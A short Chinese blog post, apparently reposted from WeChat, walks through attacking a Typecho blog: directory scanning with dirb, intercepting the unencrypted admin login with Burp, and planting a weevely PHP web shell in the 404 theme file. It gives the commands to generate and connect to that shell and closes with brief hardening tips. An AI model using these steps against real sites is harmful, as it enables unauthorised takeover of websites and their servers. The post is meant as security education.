Typecho
是一款轻量级的博客程序,和著名的博客程序WP有很多相似之处。本文简单谈谈Typecho安全相关问题。
注意!文本所有测试均为模拟环境,旨在提出安全相关问题,帮助站长防患于未然。坚决反对一切维护网络安全的行为。
前不久,提到过Typecho相关XXS漏洞。现在均已修复,本文不再长谈。下面简单谈谈常见的思路吧!
后台扫描
可以利用常见的目录扫描工具,对站点的敏感目录进行扫描。
dirb https://blog.bbskali.cn
通过扫描,我们便得到了站点的后台。
密码恢复
Typecho目前后台登录,安全防范比较低,没有验证码,密码传输没有加密。
既然没有加密,直接可以用Burp直接恢复。
提权
当用户登录后,接下来便是提权了。Typecho和WP一样,支持在线编辑主题文件。这里,我们以404
文件为例。
随便输入一个错误的URL
能够复现php探针就好玩了。我们用weevely
创建一个Shell
# bbskali为连接密码weevely generate bbskali 4.php
查看生成的代码
cat 4.php
连接:
weevely http://blog.bbskali.cn/404.php bbskali
安全建议
-
修改网站后台地址 -
加强用户名和密码 -
使用第三方验证码插件
原文始发于微信公众号(kali笔记):浅谈Typecho安全与防范
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论